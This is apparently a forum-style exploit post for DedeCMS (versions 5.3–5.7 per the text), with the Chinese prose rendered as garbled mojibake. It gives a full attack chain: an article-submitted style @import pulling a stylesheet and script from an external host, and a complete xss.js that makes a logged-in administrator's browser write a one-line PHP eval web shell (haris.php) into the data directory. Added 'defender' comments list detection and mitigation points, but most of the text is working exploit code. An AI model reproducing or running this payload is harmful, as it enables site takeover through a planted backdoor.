dedecms xss odayͨɱа汾 getshell
<DIV id=read_tpc mb10?>©ԭڱ༭˲ϣ¶űСgetshellΪʲô˵ODayأgetshellĶOD`(߷Ҳܱ)
ĿǰֻDzԹ5.35.7汾İ汾ҾɷӰɡ
˵˵÷
2
1.ע
2.Ͷ
עԱ----
д
ƴ
<style>@im\port'\http://xxx.com/xss.css';</style>
½XSS.Css
ƴ
.body{
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
½xss.js Ϊ
ƴ
// Defender's note: this listing is the xss.js payload the page describes. It is
// pulled into an administrator's browser through the @import'ed stylesheet shown
// above and issues a single POST to the DedeCMS admin file editor
// (sys_sql_query.php) from the admin's own browser session -- no credentials
// appear anywhere in this script, so the browser-attached session is what makes
// the write succeed. Detection and mitigation points are noted inline.
1.var request = false;
2.if(window.XMLHttpRequest) {
3.request = new XMLHttpRequest();
4.if(request.overrideMimeType) {
5.request.overrideMimeType('text/xml');
6.}
7.} else if(window.ActiveXObject) {
// Legacy IE fallback: tries a list of MSXML ProgIDs in turn, swallowing failures.
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
9.for(var i=0; i<versions.length; i++) {
10.try {
11.request = new ActiveXObject(versions);
12.} catch(e) {}
13.}
14.}
// Implicit global (no var): the request object is shared with add_admin() below.
15.xmlhttp=request;
// Splits the given URL on '/' and returns the resulting array; the caller uses
// this to derive the path the POST is sent to.
16.function getFolder( url ){
17. obj = url.split('/')
18. return obj
19.}
// top.location.href: the URL of the page the admin is currently viewing.
20.oUrl = top.location.href;
21.u = getFolder(oUrl);
// Fires immediately on script load -- no interaction by the viewing admin is
// required once the stylesheet import has executed.
22.add_admin();
// Despite its name this does not create an admin account: the form body asks the
// admin file editor to save a new file named haris.php under /data whose content,
// once URL-decoded, is a one-line PHP eval of $_POST[cmd] -- a web shell.
// Detection: POSTs to sys_sql_query.php carrying fmdo=edit together with a .php
// filename, new .php files appearing under data/, and admin-area requests whose
// Referer is a front-end content page rather than the admin UI.
// Mitigation: a per-request anti-CSRF token on admin write actions, stripping
// <style>/@import (and other active content) from user-submitted articles, and
// denying PHP execution in data/upload directories.
23.function add_admin(){
24.var url= "/"+u+"/sys_sql_query.php";
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
26.xmlhttp.open("POST", url, true);
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// Content-length / Connection are browser-controlled; setting them here has no
// effect in modern browsers.
28.xmlhttp.setRequestHeader("Content-length", params.length);
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
30.xmlhttp.send(params);
31.}
ԱƪµʱԶdataĿ¼һ仰haris.phpcmd